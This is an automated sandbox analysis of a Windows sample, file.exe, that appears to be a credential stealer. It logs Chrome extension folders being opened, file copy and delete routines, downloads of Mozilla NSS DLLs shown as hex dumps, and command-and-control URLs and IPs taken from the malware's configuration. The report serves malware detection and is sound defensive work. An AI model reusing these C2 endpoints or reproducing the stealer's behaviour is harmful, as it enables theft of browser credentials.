Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64263 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64261 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64265 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64264 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64267 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64266 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64268 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64269 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64270 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64273 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64272 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64274 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64277 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64278 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64275 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64276 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64280 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64281 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64279 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64282 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64283 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64285 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64286 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64295 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64291 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64290 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64289 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64292 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64294 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64288 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64293 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64287 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64296 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64298 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64299 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64303 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64305 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64304 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64301 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64306 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64302 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64300 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64308 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64307 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64310 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64311 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64315 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64313 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64312 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64314 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64317 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64319 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64316 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64320 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64318 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64321 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64322 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64323 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64325 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64327 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64324 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64326 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64328 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64329 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64332 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64330 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64331 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64334 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64333 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64335 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64337 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64336 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64339 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64340 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64338 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64341 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64343 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64342 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64344 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64345 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64346 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64348 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64350 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64349 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64351 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64352 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64353 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64354 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64355 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64356 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64357 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64358 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64359 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64360 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64361 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64362 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64364 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64365 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64363 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64366 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64367 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64368 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64369 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64370 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64372 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64373 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64375 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64377 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_004139B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040E270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004143F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA, 0_2_00414050
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040EB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_004133C0
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: firefox.exe Memory has grown: Private usage: 0MB later: 95MB

Networking

Source: Malware configuration extractor URLs: 85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor URLs: http://85.28.47.31silence
Source: Malware configuration extractor IPs: 185.215.113.19
Source: unknown Network traffic detected: DNS query count 62
Source: global traffic TCP traffic: 192.168.2.5:64037 -> 1.1.1.1:53
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:03 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 18:09:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 
73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
